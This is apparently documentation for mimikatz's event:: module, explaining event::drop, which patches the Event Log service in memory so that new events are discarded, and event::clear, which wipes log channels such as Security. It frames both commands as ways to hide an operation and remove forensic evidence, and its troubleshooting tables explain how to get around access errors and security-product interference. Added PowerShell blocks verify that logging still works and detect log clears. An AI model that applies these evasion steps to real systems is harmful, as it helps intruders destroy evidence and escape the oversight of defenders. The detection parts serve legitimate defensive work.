event:: module documentation
The event:: module groups commands that interact with the Windows Event Log
service. Each command is summarized below with its purpose, available flags,
and guidance on when and why to use them.
| Command | Description |
|---|---|
| event::drop | Apply an in-memory patch to the Event Log service so that new events are silently discarded. |
| event::clear | Clear the contents of a specified Windows event log channel. |
event::drop
Purpose: Temporarily patch the running Event Log service process so that it
returns immediately when attempting to persist new events. While the patch is
in place the system records no further log entries; because the patch lives only
in process memory, it disappears when the service process is restarted or the
machine reboots.
Syntax:
mimikatz # event::drop
Flags: None.
How it works:
event::drop calls kull_m_patch_genericProcessOrServiceFromBuild, which locates
the process hosting the EventLog service and applies the patch inside it. The
byte pattern and its replacement are selected by the local Windows build and
target the module implementing the service on that build (eventlog.dll on older
systems, wevtsvc.dll on current ones). The patched routine is the event write
path, Channel::ActualProcessEvent (or PerformWriteRequest on older systems),
which is made to return immediately, so events still reach the service but are
never persisted.
Why use it: This is useful during offensive operations when you need to
prevent Windows from recording new security or application events that could
expose your activities. Because the patch intercepts event processing at the
service level, any component that relies on the standard logging pipeline will
quietly fail to persist events until the service is restarted or the system is
rebooted, reverting the patch.
Caution: The technique is experimental and invasive. Patching core services
can destabilize the system or trigger security controls. Always test in a lab
and be prepared to restart the Event Log service to restore normal logging.
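The check and the recovery step a practitioner wants around this command, as an added PowerShell example (not mimikatz code and not part of the original page): it writes a uniquely tagged event and reads it back, which is the only reliable way to tell whether the service is still persisting events once the write path has been patched, and it then attempts the service restart the caution above refers to. The source name EventDropCheck and event ID 4242 are arbitrary values chosen for this example.

```powershell
# Added example (not mimikatz code): verify that the Event Log service is
# actually persisting events, to run before and after event::drop, plus the
# recovery step. Assumptions: elevated PowerShell; the source name
# "EventDropCheck" and event ID 4242 are arbitrary values for this example.

function Test-EventLogPersistence {
    param([string]$Source = 'EventDropCheck', [int]$EventId = 4242)

    # Write-EventLog needs a registered source; registering one requires admin.
    if (-not [System.Diagnostics.EventLog]::SourceExists($Source)) {
        New-EventLog -LogName Application -Source $Source
    }

    # A unique marker distinguishes this write from earlier checks.
    $marker = [guid]::NewGuid().ToString()
    Write-EventLog -LogName Application -Source $Source -EventId $EventId `
        -EntryType Information -Message "persistence check $marker"
    Start-Sleep -Seconds 2

    # With the service patched the write call still succeeds but nothing is
    # stored, so reading the record back is the only trustworthy signal.
    $hit = Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = $Source; Id = $EventId } `
        -MaxEvents 50 -ErrorAction SilentlyContinue |
        Where-Object { $_.Properties.Value -like "*$marker*" }
    return [bool]$hit
}

function Restore-EventLogService {
    # The patch exists only in the running service process; a restart loads a
    # clean wevtsvc.dll/eventlog.dll. -Force also restarts dependent services.
    try {
        Restart-Service -Name EventLog -Force -ErrorAction Stop
        return ((Get-Service -Name EventLog).Status -eq 'Running')
    } catch {
        Write-Warning "Could not restart EventLog ($($_.Exception.Message)); a reboot drops the in-memory patch."
        return $false
    }
}

if (Test-EventLogPersistence) {
    'Event Log is persisting events.'
} else {
    'Event Log is NOT persisting events (patched or otherwise broken).'
    if ((Restore-EventLogService) -and (Test-EventLogPersistence)) { 'Logging restored.' }
}
```

Run the script once before event::drop to confirm a baseline of "persisting", and again afterwards; a successful Write-EventLog call on its own proves nothing, because the patched service accepts the event and discards it. If the service controller refuses the restart, only a reboot reverts the patch.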
Example usage:
mimikatz # privilege::debug
mimikatz # event::drop
"EventLog" service patched
Example output explanation: After elevating with privilege::debug,
"EventLog" service patched confirms that the byte pattern in
eventlog.dll/wevtsvc.dll was successfully replaced for the running
EventLog service.【F:modules/kull_m_patch.c†L93-L108】【F:mimikatz/modules/kuhl_m_event.c†L77-L80】
Potential errors and troubleshooting:
| Symptom | Likely cause | Mitigation |
|---|---|---|
| Incorrect version in references | The local Windows build does not match any of the hard-coded patch signatures. | Confirm the OS build number and either use a supported build or extend the signature table before retrying.【F:modules/kull_m_patch.c†L89-L117】 |
| Service is not running | The Event Log service is stopped, so there is no target process to patch. | Start the EventLog service (sc start eventlog) and rerun the command.【F:modules/kull_m_patch.c†L93-L115】 |
| ERROR kuhl_m_service_getUniqueForName ; ... | The service controller query failed, most commonly because of insufficient rights. | Run mimikatz as an administrator and enable SeDebugPrivilege with privilege::debug before invoking event::drop.【F:modules/kull_m_patch.c†L93-L115】 |
| ERROR OpenProcess (0x00000005) | 0x00000005 is ERROR_ACCESS_DENIED: the token lacks the privilege needed to open the Event Log service process with the read/write/operation access the patch requires. | Re-run mimikatz elevated and execute privilege::debug before event::drop so that OpenProcess can obtain a handle with the requested access.【F:modules/kull_m_patch.c†L97-L113】 |
| ERROR kull_m_patch (0xC000...) | The pattern search or the memory write failed, typically because a security product interfered, the module layout was unexpected, or the build is unsupported. | In a lab, rule out interfering security controls, verify the module versions, and confirm the build is covered by the EventReferences table; on a real target, expect the attempt itself to be noticed.【F:mimikatz/modules/kuhl_m_event.c†L17-L74】【F:modules/kull_m_patch.c†L99-L110】 |
event::clear
Purpose: Clear all records from a specific Windows event log channel and
report the number of entries before and after the operation.【F:mimikatz/modules/kuhl_m_event.c†L83-L103】
Syntax:
mimikatz # event::clear [/log:<ChannelName>]
Flags:
| Flag | Description | Why use it |
|---|---|---|
| /log:<ChannelName> | Specifies which event log to open and clear. If omitted, the command defaults to the Security log.【F:mimikatz/modules/kuhl_m_event.c†L88-L99】 | Targeting the right log ensures you only purge the records relevant to your operation. Overriding the default prevents accidental clearing of the high-value Security log when you intend to manipulate another channel. |
How it works:
event::clear reads the log name from the /log argument, defaulting to
Security when the flag is not provided.【F:mimikatz/modules/kuhl_m_event.c†L88-L90】 It opens
the log with the legacy OpenEventLog API, prints the current record count,
calls ClearEventLog to wipe the log and reports success or the encountered
error, then prints the record count again.
Why use it: Clearing an event log can remove forensic evidence of your
activities, especially when done immediately after executing noisy actions. The
command's before/after counts give quick confirmation that the purge succeeded.
Be aware that clearing a log is itself an audited event that defenders may
notice: clearing the Security log produces event ID 1102 in the Security log,
and clearing any other log produces event ID 104 in the System log.
Example usage:
mimikatz # event::clear /log:Security
Using "Security" event log :
- 231 event(s)
- Cleared !
- 0 event(s)
Example output explanation: The command echoes the targeted channel, displays
the record count before clearing, confirms when ClearEventLog succeeds, and
prints the remaining records so you can verify the purge.【F:mimikatz/modules/kuhl_m_event.c†L88-L99】
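The same before/clear/after sequence done with built-in tooling, together with the audit trail a clear leaves behind, as an added PowerShell example (not mimikatz code and not part of the original page). It assumes an elevated PowerShell session (clearing Security requires SeSecurityPrivilege) and takes any channel name that wevtutil accepts; the seven-day look-back in Find-LogClearEvents is an arbitrary default for this example.

```powershell
# Added example (not mimikatz code): reproduce event::clear's count/clear/count
# sequence with built-in tooling, then hunt for the records the clear leaves.
# Assumptions: elevated PowerShell; $LogName is any channel wevtutil accepts;
# the 7-day look-back is an arbitrary default.

function Get-ChannelRecordCount {
    param([Parameter(Mandatory)][string]$LogName)
    # -ListLog reports RecordCount for classic logs and modern channels alike,
    # and fails on an unknown name instead of silently opening another log.
    (Get-WinEvent -ListLog $LogName -ErrorAction Stop).RecordCount
}

function Clear-ChannelWithCounts {
    param([Parameter(Mandatory)][string]$LogName)
    $before = Get-ChannelRecordCount -LogName $LogName
    # wevtutil cl clears any channel; Clear-EventLog only handles classic logs.
    & wevtutil.exe cl $LogName
    if ($LASTEXITCODE -ne 0) { throw "wevtutil cl '$LogName' failed with exit code $LASTEXITCODE" }
    $after = Get-ChannelRecordCount -LogName $LogName
    # A small non-zero "after" value is normal: the clear itself is audited
    # (1102 in Security, 104 in System) and busy channels keep receiving events.
    [pscustomobject]@{ Log = $LogName; Before = $before; After = $after }
}

function Find-LogClearEvents {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    # What a defender looks for after a clear:
    #   Security 1102 - the Security log was cleared (message names the subject)
    #   System   104  - some other log was cleared (message names the channel)
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $Since },
        @{ LogName = 'System';   Id = 104;  StartTime = $Since }
    )
    foreach ($f in $filters) {
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue |
            Select-Object TimeCreated, LogName, Id,
                @{ n = 'Summary'; e = { ($_.Message -split "`r?`n")[0] } }
    }
}

# Usage: clear the Application log, then show the trail the clear just left.
Clear-ChannelWithCounts -LogName 'Application' | Format-Table -AutoSize
Find-LogClearEvents | Format-Table -AutoSize
```

The design point is the second function: every clear, whether done with mimikatz, wevtutil or Event Viewer, is written to a log the attacker did not clear (or, for Security, to the freshly cleared log itself), so Find-LogClearEvents is the query a responder runs first when a channel looks suspiciously empty.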
Potential errors and troubleshooting:
| Symptom | Likely cause | Mitigation |
|---|---|---|
| ERROR OpenEventLog (0x00000005) or ERROR OpenEventLog (0x00000002) | 0x00000005 is ERROR_ACCESS_DENIED (insufficient rights on an administrative log); 0x00000002 is ERROR_FILE_NOT_FOUND (the log could not be opened). | Run mimikatz from an elevated context for administrative logs and double-check the /log:<ChannelName> value. The command uses the legacy OpenEventLog API, which knows the classic logs (Application, System, Security and others registered under the EventLog service key) and, per the API documentation, opens the Application log when a custom name is not found, so a modern channel name such as Microsoft-Windows-TaskScheduler/Operational will not be targeted.【F:mimikatz/modules/kuhl_m_event.c†L88-L101】 |
| ERROR ClearEventLog (0x00000005) | The user lacks rights to clear the specified log. | Ensure the account is a local administrator or holds SeSecurityPrivilege, and consider stopping log forwarding tools that may hold the channel open.【F:mimikatz/modules/kuhl_m_event.c†L95-L98】 |
| Record count after clearing is not zero | The clear itself is audited (1102 in Security, 104 in System for other logs) and busy channels receive new events immediately. A count that is essentially unchanged, rather than small, indicates the clear ran against a different log than intended (see the OpenEventLog fallback above). | Compare the timestamps of the remaining records with the time of the clear; if they predate it, re-check the log name and rerun the command.【F:mimikatz/modules/kuhl_m_event.c†L93-L99】 |